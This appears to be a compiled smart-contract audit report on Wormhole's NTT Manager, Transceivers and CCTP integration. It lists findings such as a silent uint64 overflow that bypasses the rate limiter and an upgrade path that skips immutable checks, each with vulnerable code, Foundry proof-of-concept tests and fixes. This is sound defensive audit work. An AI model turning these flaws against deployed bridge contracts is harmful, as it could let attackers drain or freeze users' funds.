address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiverChain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation), ""))\\n );\\n\\n // transceiver 2\\n WormholeTransceiver wormholeTransceiverChain1Implementation2 = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiver2Chain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation2), ""))\\n );\\n\\n // transceiver 3\\n WormholeTransceiver wormholeTransceiverChain1Implementation3 = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiver3Chain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation3), ""))\\n );\\n\\n\\n 
// Actually initialize properly now\\n wormholeTransceiverChain1.initialize();\\n wormholeTransceiver2Chain1.initialize();\\n wormholeTransceiver3Chain1.initialize();\\n\\n\\n nttManagerChain1.setTransceiver(address(wormholeTransceiverChain1));\\n nttManagerChain1.setTransceiver(address(wormholeTransceiver2Chain1));\\n\\n // third transceiver is NOT set at this point for nttManagerChain1\\n nttManagerChain1.setOutboundLimit(type(uint64).max);\\n nttManagerChain1.setInboundLimit(type(uint64).max, chainId2);\\n\\n // Chain 2 setup\\n vm.chainId(chainId2);\\n DummyToken t2 = new DummyTokenMintAndBurn();\\n NttManager implementationChain2 =\\n new MockNttManagerContract(address(t2), INttManager.Mode.BURNING, chainId2, 1 days);\\n\\n nttManagerChain2 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementationChain2), "")));\\n nttManagerChain2.initialize();\\n\\n WormholeTransceiver wormholeTransceiverChain2Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain2),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n\\n wormholeTransceiverChain2 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain2Implementation), ""))\\n );\\n wormholeTransceiverChain2.initialize();\\n\\n nttManagerChain2.setTransceiver(address(wormholeTransceiverChain2));\\n nttManagerChain2.setOutboundLimit(type(uint64).max);\\n nttManagerChain2.setInboundLimit(type(uint64).max, chainId1);\\n\\n // Register peer contracts for the nttManager and transceiver. Transceivers and nttManager each have the concept of peers here.\\n nttManagerChain1.setPeer(chainId2, bytes32(uint256(uint160(address(nttManagerChain2)))), 9);\\n nttManagerChain2.setPeer(chainId1, bytes32(uint256(uint160(address(nttManagerChain1)))), 7);\\n\\n // Set peers for the transceivers\\n wormholeTransceiverChain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiver2Chain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiver3Chain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n\\n wormholeTransceiverChain2.setWormholePeer(\\n chainId1, bytes32(uint256(uint160(address(wormholeTransceiverChain1))))\\n );\\n\\n\\n require(nttManagerChain1.getThreshold() != 0, "Threshold is zero with active transceivers");\\n\\n // Actually set it\\n nttManagerChain1.setThreshold(2);\\n nttManagerChain2.setThreshold(1);\\n }\\n\\n function testTransceiverModification() external {\\n vm.chainId(chainId1);\\n\\n // Setting up the transfer\\n DummyToken token1 = DummyToken(nttManagerChain1.token());\\n uint8 decimals = token1.decimals();\\n\\n token1.mintDummy(address(userA), 5 * 10 ** decimals);\\n uint256 outboundLimit = 4 * 10 ** decimals;\\n nttManagerChain1.setOutboundLimit(outboundLimit);\\n\\n vm.startPrank(userA);\\n\\n uint256 transferAmount = 5 * 10 ** decimals;\\n token1.approve(address(nttManagerChain1), transferAmount);\\n\\n // transfer with shouldQueue == true\\n uint64 qSeq = nttManagerChain1.transfer(\\n transferAmount, chainId2, toWormholeFormat(userB), true, encodeTransceiverInstructions(true)\\n );\\n vm.stopPrank();\\n\\n assertEq(qSeq, 0);\\n IRateLimiter.OutboundQueuedTransfer memory qt = nttManagerChain1.getOutboundQueuedTransfer(0);\\n assertEq(qt.amount.getAmount(), transferAmount.trim(decimals, decimals).getAmount());\\n 
assertEq(qt.recipientChain, chainId2);\\n assertEq(qt.recipient, toWormholeFormat(userB));\\n assertEq(qt.txTimestamp, initialBlockTimestamp);\\n\\n // assert that the contract also locked funds from the user\\n assertEq(token1.balanceOf(address(userA)), 0);\\n assertEq(token1.balanceOf(address(nttManagerChain1)), transferAmount);\\n\\n\\n // elapse some random time - 60 seconds\\n uint256 durationElapsedTime = initialBlockTimestamp + 60;\\n\\n // now add a third transceiver\\n nttManagerChain1.setTransceiver(address(wormholeTransceiver3Chain1));\\n\\n // verify that the third transceiver is added\\n assertEq(nttManagerChain1.getTransceivers().length, 3);\\n\\n // remove second transceiver\\n nttManagerChain1.removeTransceiver(address(wormholeTransceiver2Chain1));\\n\\n // verify that the second transceiver is removed\\n assertEq(nttManagerChain1.getTransceivers().length, 2);\\n\\n // elapse rate limit duration\\n durationElapsedTime = initialBlockTimestamp + nttManagerChain1.rateLimitDuration();\\n\\n vm.warp(durationElapsedTime);\\n\\n vm.expectRevert(stdError.indexOOBError); //index out of bounds - transceiver instructions array does not have a third element to access\\n nttManagerChain1.completeOutboundQueuedTransfer(0);\\n }\\n\\n // Encode an instruction for each of the relayers\\n function encodeTransceiverInstructions(bool relayer_off) public view returns (bytes memory) {\\n WormholeTransceiver.WormholeTransceiverInstruction memory instruction =\\n IWormholeTransceiver.WormholeTransceiverInstruction(relayer_off);\\n\\n bytes memory encodedInstructionWormhole =\\n wormholeTransceiverChain1.encodeWormholeTransceiverInstruction(instruction);\\n\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction1 =\\n TransceiverStructs.TransceiverInstruction({index: 0, payload: encodedInstructionWormhole});\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction2 =\\n TransceiverStructs.TransceiverInstruction({index: 1, payload: encodedInstructionWormhole});\\n\\n TransceiverStructs.TransceiverInstruction[] memory TransceiverInstructions =\\n new TransceiverStructs.TransceiverInstruction[](2);\\n\\n TransceiverInstructions[0] = TransceiverInstruction1;\\n TransceiverInstructions[1] = TransceiverInstruction2;\\n\\n return TransceiverStructs.encodeTransceiverInstructions(TransceiverInstructions);\\n }\\n}\\n```\\n
```\\n/* snip */\\n// now check rate limits\\nbool isAmountRateLimited = _isOutboundAmountRateLimited(internalAmount);\\nif (!shouldQueue && isAmountRateLimited) {\\n revert NotEnoughCapacity(getCurrentOutboundCapacity(), amount);\\n}\\nif (shouldQueue && isAmountRateLimited) {\\n // emit an event to notify the user that the transfer is rate limited\\n emit OutboundTransferRateLimited(\\n msg.sender, sequence, amount, getCurrentOutboundCapacity()\\n );\\n\\n // queue up and return\\n _enqueueOutboundTransfer(\\n sequence,\\n trimmedAmount,\\n recipientChain,\\n recipient,\\n msg.sender,\\n transceiverInstructions\\n );\\n\\n // refund price quote back to sender\\n _refundToSender(msg.value);\\n\\n // return the sequence in the queue\\n return sequence;\\n}\\n/* snip */\\n```\\n
Silent overflow in `TrimmedAmount::shift` could result in rate limiter being bypassed
medium
Within `TrimmedAmount::trim`, there is an explicit check that ensures the scaled amount does not exceed the maximum uint64:\\n```\\n// NOTE: amt after trimming must fit into uint64 (that's the point of\\n// trimming, as Solana only supports uint64 for token amts)\\nif (amountScaled > type(uint64).max) {\\n revert AmountTooLarge(amt);\\n}\\n```\\n\\nHowever, no such check exists within `TrimmedAmount::shift` which means there is potential for silent overflow when casting to `uint64` here:\\n```\\nfunction shift(\\n TrimmedAmount memory amount,\\n uint8 toDecimals\\n) internal pure returns (TrimmedAmount memory) {\\n uint8 actualToDecimals = minUint8(TRIMMED_DECIMALS, toDecimals);\\n return TrimmedAmount(\\n uint64(scale(amount.amount, amount.decimals, actualToDecimals)), actualToDecimals\\n );\\n}\\n```\\n
Explicitly check the scaled amount in `TrimmedAmount::shift` does not exceed the maximum `uint64`.
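A minimal sketch of the fix, mirroring the existing bounds check from `trim()` before the cast (the `AmountTooLarge` error is reused from `trim()`):\\n```\\nfunction shift(\\n TrimmedAmount memory amount,\\n uint8 toDecimals\\n) internal pure returns (TrimmedAmount memory) {\\n uint8 actualToDecimals = minUint8(TRIMMED_DECIMALS, toDecimals);\\n uint256 amountScaled = scale(amount.amount, amount.decimals, actualToDecimals);\\n\\n // revert instead of silently truncating on the uint64 cast\\n if (amountScaled > type(uint64).max) {\\n revert AmountTooLarge(amountScaled);\\n }\\n\\n return TrimmedAmount(uint64(amountScaled), actualToDecimals);\\n}\\n```\\n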
A silent overflow in `TrimmedAmount::shift` could result in the rate limiter being bypassed, considering its usage in `NttManager::_transferEntryPoint`. Given the high impact and reasonable likelihood of this issue occurring, it is classified as a MEDIUM severity finding.
```\\n// NOTE: amt after trimming must fit into uint64 (that's the point of\\n// trimming, as Solana only supports uint64 for token amts)\\nif (amountScaled > type(uint64).max) {\\n revert AmountTooLarge(amt);\\n}\\n```\\n
Disabled Transceivers cannot be re-enabled by calling `TransceiverRegistry::_setTransceiver` after 64 have been registered
medium
`TransceiverRegistry::_setTransceiver` handles the registering of Transceivers, but note that they cannot be re-registered as this has other downstream effects, so this function is also responsible for re-enabling previously registered but currently disabled Transceivers.\\n```\\nfunction _setTransceiver(address transceiver) internal returns (uint8 index) {\\n /* snip */\\n if (transceiver == address(0)) {\\n revert InvalidTransceiverZeroAddress();\\n }\\n\\n if (_numTransceivers.registered >= MAX_TRANSCEIVERS) {\\n revert TooManyTransceivers();\\n }\\n\\n if (transceiverInfos[transceiver].registered) {\\n transceiverInfos[transceiver].enabled = true;\\n } else {\\n /* snip */\\n}\\n```\\n\\nThis function reverts if the passed transceiver address is `address(0)` or the number of registered transceivers is already at its defined maximum of 64. Assuming a total of 64 registered Transceivers, with some of them previously disabled, the placement of this latter validation prevents a disabled Transceiver from being re-enabled, since the subsequent block that sets its enabled state back to `true` is unreachable. Consequently, once the maximum number of Transceivers has been registered, every call to this function will revert with `TooManyTransceivers`, so no disabled Transceiver can be re-enabled without a contract upgrade.
Move the placement of the maximum Transceivers validation to within the `else` block that is responsible for handling the registration of new Transceivers.
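A sketch of the reordering, so that the cap only guards new registrations and re-enabling an already-registered Transceiver remains possible:\\n```\\nfunction _setTransceiver(address transceiver) internal returns (uint8 index) {\\n /* snip */\\n if (transceiver == address(0)) {\\n revert InvalidTransceiverZeroAddress();\\n }\\n\\n if (transceiverInfos[transceiver].registered) {\\n // re-enabling no longer hits the MAX_TRANSCEIVERS cap\\n transceiverInfos[transceiver].enabled = true;\\n } else {\\n // the cap applies only to brand-new registrations\\n if (_numTransceivers.registered >= MAX_TRANSCEIVERS) {\\n revert TooManyTransceivers();\\n }\\n /* snip */\\n }\\n}\\n```\\n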
Under normal circumstances, this maximum number of registered Transceivers should never be reached, especially since the underlying Transceivers are upgradeable. However, while unlikely based on operational assumptions, this undefined behavior could have a high impact, and so this is classified as a MEDIUM severity finding.
```\\nfunction _setTransceiver(address transceiver) internal returns (uint8 index) {\\n /* snip */\\n if (transceiver == address(0)) {\\n revert InvalidTransceiverZeroAddress();\\n }\\n\\n if (_numTransceivers.registered >= MAX_TRANSCEIVERS) {\\n revert TooManyTransceivers();\\n }\\n\\n if (transceiverInfos[transceiver].registered) {\\n transceiverInfos[transceiver].enabled = true;\\n } else {\\n /* snip */\\n}\\n```\\n
NTT Manager cannot be unpaused once paused
medium
`NttManagerState::pause` exposes pause functionality to be triggered by permissioned actors but has no corresponding unpause functionality. As such, once the NTT Manager is paused, it will not be possible to unpause without a contract upgrade.\\n```\\nfunction pause() public onlyOwnerOrPauser {\\n _pause();\\n}\\n```\\n
```\\n// Add the line below\\n function unpause() public onlyOwnerOrPauser {\\n// Add the line below\\n _unpause();\\n// Add the line below\\n }\\n```\\n
The inability to unpause the NTT Manager could result in significant disruption, requiring either a contract upgrade or complete redeployment to resolve this issue.
```\\nfunction pause() public onlyOwnerOrPauser {\\n _pause();\\n}\\n```\\n
Transceiver invariants and ownership synchronicity can be broken by unsafe Transceiver upgrades
medium
Transceivers are upgradeable contracts integral to the cross-chain message handling of NTT tokens. While `WormholeTransceiver` is a specific implementation of the `Transceiver` contract, NTT Managers can integrate with Transceivers of any custom implementation.\\n`Transceiver::_checkImmutables` is an internal virtual function that verifies that invariants are not violated during an upgrade. Two checks in this function are that a) the NTT Manager address remains the same and b) the underlying NTT token address remains the same.\\nHowever, the current logic allows integrators to bypass these checks by either:\\nOverriding the `_checkImmutables()` function without the above checks.\\nCalling `Implementation::_setMigratesImmutables` with a `true` input. This effectively bypasses the `_checkImmutables()` function validation during an upgrade.\\nBased on the understanding that Transceivers are deployed by integrators external to NTT Manager owners, regardless of the high trust assumptions associated with integrators, it is risky for NTT Managers to delegate power to Transceivers to silently upgrade a transceiver contract that can potentially violate the NTT Manager invariants.\\nOne example of this involves the intended ownership model. Within `Transceiver::_initialize`, the owner of the Transceiver is set to the owner of the `NttManager` contract:\\n```\\nfunction _initialize() internal virtual override {\\n // check if the owner is the deployer of this contract\\n if (msg.sender != deployer) {\\n revert UnexpectedDeployer(deployer, msg.sender);\\n }\\n\\n __ReentrancyGuard_init();\\n // owner of the transceiver is set to the owner of the nttManager\\n __PausedOwnable_init(msg.sender, getNttManagerOwner());\\n}\\n```\\n\\nHowever, the transferring of this ownership via `Transceiver::transferTransceiverOwnership` is only allowed by the NTT Manager itself:\\n```\\n/// @dev transfer the ownership of the transceiver to a new address\\n/// the nttManager should be able to update transceiver ownership.\\nfunction transferTransceiverOwnership(address newOwner) external onlyNttManager {\\n _transferOwnership(newOwner);\\n}\\n```\\n\\nWhen the owner of the NTT Manager is changed by calling `NttManagerState::transferOwnership`, the owner of all the Transceivers is changed with it:\\n```\\n/// @notice Transfer ownership of the Manager contract and all Endpoint contracts to a new owner.\\nfunction transferOwnership(address newOwner) public override onlyOwner {\\n super.transferOwnership(newOwner);\\n // loop through all the registered transceivers and set the new owner of each transceiver to the newOwner\\n address[] storage _registeredTransceivers = _getRegisteredTransceiversStorage();\\n _checkRegisteredTransceiversInvariants();\\n\\n for (uint256 i = 0; i < _registeredTransceivers.length; i++) {\\n ITransceiver(_registeredTransceivers[i]).transferTransceiverOwnership(newOwner);\\n }\\n}\\n```\\n\\nThis design is intended to ensure that the NTT Manager's owner is kept in sync across all transceivers, access-controlled to prevent unauthorized ownership changes, but transceiver ownership can still be transferred directly as the public `OwnableUpgradeable::transferOwnership` function has not been overridden. Even if Transceiver ownership changes, the Manager is permitted to change it again via the above function.\\nHowever, this behavior can be broken if the new owner of a Transceiver performs a contract upgrade without the immutables check. 
In this way, they can change the NTT Manager, preventing the correct manager from having permissions as expected. As a result, `NttManagerState::transferOwnership` will revert if any one Transceiver is out of sync with the others, and since it is not possible to remove an already registered transceiver, this function will cease to be useful. Instead, each Transceiver will be forced to be manually updated to the new owner unless the modified Transceiver is reset back to the previous owner so that this function can be called again.
Consider preventing Transceiver implementations from overriding `Transceiver::_checkImmutables` or reaching `Implementation::_setMigratesImmutables`. If `_checkImmutables()` must remain extensible, consider making it final (non-virtual) and exposing a separate virtual hook that it calls, as follows:\\n```\\nfunction _checkImmutables() internal view override {\\n assert(this.nttManager() == nttManager);\\n assert(this.nttManagerToken() == nttManagerToken);\\n _checkAdditionalImmutables();\\n}\\n\\nfunction _checkAdditionalImmutables() internal view virtual {}\\n```\\n
While this issue may require the owner of a Transceiver to misbehave, a scenario where a Transceiver is silently upgraded with a new NTT Manager or NTT Manager token can be problematic for cross-chain transfers and so is worth noting.\\nProof of Concept: The below PoC calls the `_setMigratesImmutables()` function with the `true` boolean, effectively bypassing the `_checkImmutables()` invariant check. As a result, a subsequent call to `NttManagerState::transferOwnership` is demonstrated to revert. This test should be added to the contract in `Upgrades.t.sol` before running, and the revert in `MockWormholeTransceiverContract::transferOwnership` should be removed so that ownership transfers behave as they would in production.\\n```\\nfunction test_immutableUpgradePoC() public {\\n // create the new mock ntt manager contract\\n NttManager newImpl = new MockNttManagerContract(\\n nttManagerChain1.token(), IManagerBase.Mode.BURNING, chainId1, 1 days, false\\n );\\n MockNttManagerContract newNttManager =\\n MockNttManagerContract(address(new ERC1967Proxy(address(newImpl), "")));\\n newNttManager.initialize();\\n\\n // transfer transceiver ownership\\n wormholeTransceiverChain1.transferOwnership(makeAddr("new transceiver owner"));\\n\\n // create the new transceiver implementation, specifying the new ntt manager\\n WormholeTransceiver wormholeTransceiverChain1Implementation = new MockWormholeTransceiverImmutableAllow(\\n address(newNttManager),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n\\n // perform the transceiver upgrade\\n wormholeTransceiverChain1.upgrade(address(wormholeTransceiverChain1Implementation));\\n\\n // ntt manager ownership transfer should fail and revert\\n vm.expectRevert(abi.encodeWithSelector(ITransceiver.CallerNotNttManager.selector, address(this)));\\n nttManagerChain1.transferOwnership(makeAddr("new ntt manager owner"));\\n}\\n```\\n
```\\nfunction _initialize() internal virtual override {\\n // check if the owner is the deployer of this contract\\n if (msg.sender != deployer) {\\n revert UnexpectedDeployer(deployer, msg.sender);\\n }\\n\\n __ReentrancyGuard_init();\\n // owner of the transceiver is set to the owner of the nttManager\\n __PausedOwnable_init(msg.sender, getNttManagerOwner());\\n}\\n```\\n
Asymmetry in Transceiver pausing capability
low
Pausing functionality is exposed via `Transceiver::_pauseTransceiver`; however, there is no corresponding function that exposes unpausing functionality:\\n```\\n/// @dev pause the transceiver.\\nfunction _pauseTransceiver() internal {\\n _pause();\\n}\\n```\\n
```\\n// Add the line below\\n /// @dev unpause the transceiver.\\n// Add the line below\\n function _unpauseTransceiver() internal {\\n// Add the line below\\n _unpause();\\n// Add the line below\\n }\\n```\\n
While not an immediate issue since the above function is not currently in use anywhere, this should be resolved to avoid cases where Transceivers could become permanently paused.
```\\n/// @dev pause the transceiver.\\nfunction _pauseTransceiver() internal {\\n _pause();\\n}\\n```\\n
Incorrect Transceiver payload prefix definition
low
The `WH_TRANSCEIVER_PAYLOAD_PREFIX` constant in `WormholeTransceiverState.sol` contains invalid ASCII bytes and, as such, does not match what is written in the inline developer documentation:\\n```\\n/// @dev Prefix for all TransceiverMessage payloads\\n/// This is 0x99'E''W''H'\\n/// @notice Magic string (constant value set by messaging provider) that idenfies the payload as an transceiver-emitted payload.\\n/// Note that this is not a security critical field. It's meant to be used by messaging providers to identify which messages are Transceiver-related.\\nbytes4 constant WH_TRANSCEIVER_PAYLOAD_PREFIX = 0x9945FF10;\\n```\\n\\nThe correct payload prefix is `0x99455748`, i.e. `0x99` followed by the ASCII encoding of `"EWH"` (`0x455748`), which is output when running the following command:\\n```\\ncast --from-utf8 "EWH"\\n```\\n
Update the constant definition to use the correct prefix corresponding to the documented string:\\n```\\n// Add the line below\\n bytes4 constant WH_TRANSCEIVER_PAYLOAD_PREFIX = 0x99455748;\\n```\\n
While still a valid 4-byte hex prefix, used purely for identification purposes, an incorrect prefix could cause downstream confusion and result in otherwise valid Transceiver payloads being incorrectly prefixed.
```\\n/// @dev Prefix for all TransceiverMessage payloads\\n/// This is 0x99'E''W''H'\\n/// @notice Magic string (constant value set by messaging provider) that idenfies the payload as an transceiver-emitted payload.\\n/// Note that this is not a security critical field. It's meant to be used by messaging providers to identify which messages are Transceiver-related.\\nbytes4 constant WH_TRANSCEIVER_PAYLOAD_PREFIX = 0x9945FF10;\\n```\\n
Redemptions are blocked when L2 sequencers are down
medium
Given that rollups such as Optimism and Arbitrum offer methods for forced transaction inclusion, it is important that the aliased sender address is also checked within `Logic::redeemTokensWithPayload` when verifying the sender is the specified `mintRecipient` to allow for maximum uptime in the event of sequencer downtime.\\n```\\n// Confirm that the caller is the `mintRecipient` to ensure atomic execution.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient, "caller must be mintRecipient"\\n);\\n```\\n
Validation of the sender address against the `mintRecipient` should also consider the aliased `mintRecipient` address to allow for maximum uptime when `Logic::redeemTokensWithPayload` is called via forced inclusion.
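A hedged sketch of the aliased check, using the standard L1-to-L2 address alias offset applied by Arbitrum and Optimism to force-included transactions (the helper name is illustrative):\\n```\\nuint160 constant ALIAS_OFFSET = uint160(0x1111000000000000000000000000000000001111);\\n\\n// recover the L1 address from its L2 alias\\nfunction _undoL1ToL2Alias(address aliased) internal pure returns (address) {\\n unchecked {\\n return address(uint160(aliased) - ALIAS_OFFSET);\\n }\\n}\\n\\n// Confirm that the caller, or its un-aliased L1 counterpart, is the `mintRecipient`.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient\\n || _undoL1ToL2Alias(msg.sender).toUniversalAddress() == deposit.mintRecipient,\\n "caller must be mintRecipient"\\n);\\n```\\n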
Failure to consider the aliased `mintRecipient` address prevents the execution of valid VAAs on a target CCTP domain where transactions are batched by a centralized L2 sequencer. Since this VAA could carry a time-sensitive payload, such as the urgent cross-chain liquidity infusion to a protocol, this issue has the potential to have a high impact with reasonable likelihood.\\nProof of Concept:\\nProtocol X attempts to transfer 10,000 USDC from CCTP Domain A to CCTP Domain B.\\nCCTP Domain B is an L2 rollup that batches transactions for publishing onto the L1 chain via a centralized sequencer.\\nThe L2 sequencer goes down; however, transactions can still be executed via forced inclusion on the L1 chain.\\nProtocol X implements the relevant functionality and attempts to redeem 10,000 USDC via forced inclusion.\\nThe Wormhole CCTP integration does not consider the contract's aliased address when validating the `mintRecipient`, so the redemption fails.\\nCross-chain transfer of this liquidity will remain blocked so long as the sequencer is down.
```\\n// Confirm that the caller is the `mintRecipient` to ensure atomic execution.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient, "caller must be mintRecipient"\\n);\\n```\\n
Potentially dangerous out-of-bounds memory access in `BytesParsing::sliceUnchecked`
low
`BytesParsing::sliceUnchecked` currently bails early for the degenerate case when the slice `length` is zero; however, there is no validation on the length of the `encoded` bytes parameter itself. If the length of `encoded` is less than the slice `length`, then it is possible to access memory out-of-bounds.\\n```\\nfunction sliceUnchecked(bytes memory encoded, uint256 offset, uint256 length)\\n internal\\n pure\\n returns (bytes memory ret, uint256 nextOffset)\\n{\\n //bail early for degenerate case\\n if (length == 0) {\\n return (new bytes(0), offset);\\n }\\n\\n assembly ("memory-safe") {\\n nextOffset := add(offset, length)\\n ret := mload(freeMemoryPtr)\\n\\n /* snip: inline dev comments */\\n\\n let shift := and(length, 31) //equivalent to `mod(length, 32)` but 2 gas cheaper\\n if iszero(shift) { shift := wordSize }\\n\\n let dest := add(ret, shift)\\n let end := add(dest, length)\\n for { let src := add(add(encoded, shift), offset) } lt(dest, end) {\\n src := add(src, wordSize)\\n dest := add(dest, wordSize)\\n } { mstore(dest, mload(src)) }\\n\\n mstore(ret, length)\\n //When compiling with --via-ir then normally allocated memory (i.e. via new) will have 32 byte\\n // memory alignment and so we enforce the same memory alignment here.\\n mstore(freeMemoryPtr, and(add(dest, 31), not(31)))\\n }\\n}\\n```\\n\\nSince the `for` loop begins at the offset of `encoded` in memory, accounting for its length and the accompanying `shift` calculation that depends on the supplied `length`, and execution continues so long as `dest` is less than `end`, it is possible to continue loading additional words out of bounds simply by passing larger `length` values. Therefore, regardless of the length of the original bytes, the output slice will always have a size defined by the `length` parameter.\\nIt is understood that this is known behavior due to the unchecked nature of this function and the accompanying checked version, which performs validation on the `nextOffset` return value compared with the length of the encoded bytes.\\n```\\nfunction slice(bytes memory encoded, uint256 offset, uint256 length)\\n internal\\n pure\\n returns (bytes memory ret, uint256 nextOffset)\\n{\\n (ret, nextOffset) = sliceUnchecked(encoded, offset, length);\\n checkBound(nextOffset, encoded.length);\\n}\\n```\\n\\nIt has not been possible within the constraints of this review to identify a valid scenario in which malicious calldata can make use of this behavior to launch a successful exploit; however, this is not a guarantee that the usage of this library function is bug-free since there do exist certain quirks related to the loading of calldata.
Consider bailing early if the length of the bytes from which to construct a slice is zero, and always ensure the resultant offset is correctly validated against the length when using the unchecked version of the function.
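A usage sketch: any direct caller of the unchecked variant should validate the returned offset against the underlying length, exactly as the checked `slice()` wrapper does:\\n```\\n(bytes memory payload, uint256 nextOffset) = encoded.sliceUnchecked(offset, payloadLength);\\ncheckBound(nextOffset, encoded.length);\\n```\\n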
The impact is limited in the context of the library function's usage in the scope of this review; however, it is advisable to check any other usage elsewhere and in the future to ensure that this behavior cannot be weaponized. `BytesParsing::sliceUnchecked` is currently only used in `WormholeCctpMessages::_decodeBytes`, which itself is called in `WormholeCctpMessages::decodeDeposit`. This latter function is utilized in two places:
```\\nfunction sliceUnchecked(bytes memory encoded, uint256 offset, uint256 length)\\n internal\\n pure\\n returns (bytes memory ret, uint256 nextOffset)\\n{\\n //bail early for degenerate case\\n if (length == 0) {\\n return (new bytes(0), offset);\\n }\\n\\n assembly ("memory-safe") {\\n nextOffset := add(offset, length)\\n ret := mload(freeMemoryPtr)\\n\\n /* snip: inline dev comments */\\n\\n let shift := and(length, 31) //equivalent to `mod(length, 32)` but 2 gas cheaper\\n if iszero(shift) { shift := wordSize }\\n\\n let dest := add(ret, shift)\\n let end := add(dest, length)\\n for { let src := add(add(encoded, shift), offset) } lt(dest, end) {\\n src := add(src, wordSize)\\n dest := add(dest, wordSize)\\n } { mstore(dest, mload(src)) }\\n\\n mstore(ret, length)\\n //When compiling with --via-ir then normally allocated memory (i.e. via new) will have 32 byte\\n // memory alignment and so we enforce the same memory alignment here.\\n mstore(freeMemoryPtr, and(add(dest, 31), not(31)))\\n }\\n}\\n```\\n
A given CCTP domain can be registered for multiple foreign chains due to insufficient validation in `Governance::registerEmitterAndDomain`
low
`Governance::registerEmitterAndDomain` is a Governance action that is used to register the emitter address and corresponding CCTP domain for a given foreign chain. Validation is currently performed to ensure that the registered CCTP domain of the foreign chain is not equal to that of the local chain; however, there is no such check to ensure that the given CCTP domain has not already been registered for a different foreign chain. In this case, where the CCTP domain of an existing foreign chain is mistakenly used in the registration of a new foreign chain, the `getDomainToChain` mapping of an existing CCTP domain will be overwritten to the most recently registered foreign chain. Given the validation that prevents foreign chains from being registered again, without a method for updating an already registered emitter, it will not be possible to correct this corruption of state.\\n```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // For now, ensure that we cannot register the same foreign chain again.\\n require(registeredEmitters[foreignChain] == 0, "chain already registered");\\n\\n /* snip: additional parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n
Consider adding the following validation when registering a CCTP domain for a foreign chain:\\n```\\n// Add the line below\\n require (getDomainToChain()[cctpDomain] == 0, "CCTP domain already registered for a different foreign chain");\\n```\\n
The impact of this issue in the current scope is limited since the corrupted state is only ever queried in a public view function; however, if it is important for third-party integrators, then this has the potential to cause downstream issues.\\nProof of Concept:\\nCCTP Domain A is registered for foreign chain identifier X.\\nCCTP Domain A is again registered, this time for foreign chain identifier Y.\\nThe `getDomainToChain` mapping for CCTP Domain A now points to foreign chain identifier Y, while the `getChainToDomain` mapping for both X and Y now points to CCTP domain A.
```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // For now, ensure that we cannot register the same foreign chain again.\\n require(registeredEmitters[foreignChain] == 0, "chain already registered");\\n\\n /* snip: additional parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n
Lack of Governance action to update registered emitters
low
The Wormhole CCTP integration contract currently exposes a function `Governance::registerEmitterAndDomain` to register an emitter address and its corresponding CCTP domain on the given foreign chain; however, no such function currently exists to update this state. Any mistake made when registering the emitter and CCTP domain is irreversible unless an upgrade is performed on the entirety of the integration contract itself. Deployment of protocol upgrades comes with its own risks and should not be performed as a necessary fix for trivial human errors. Having a separate governance action to update the emitter address, foreign chain identifier, and CCTP domain is a preferable pre-emptive measure against any potential human errors.\\n```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n
The addition of a `Governance::updateEmitterAndDomain` function is recommended to allow Governance to more easily respond to any issues with the registered emitter state.
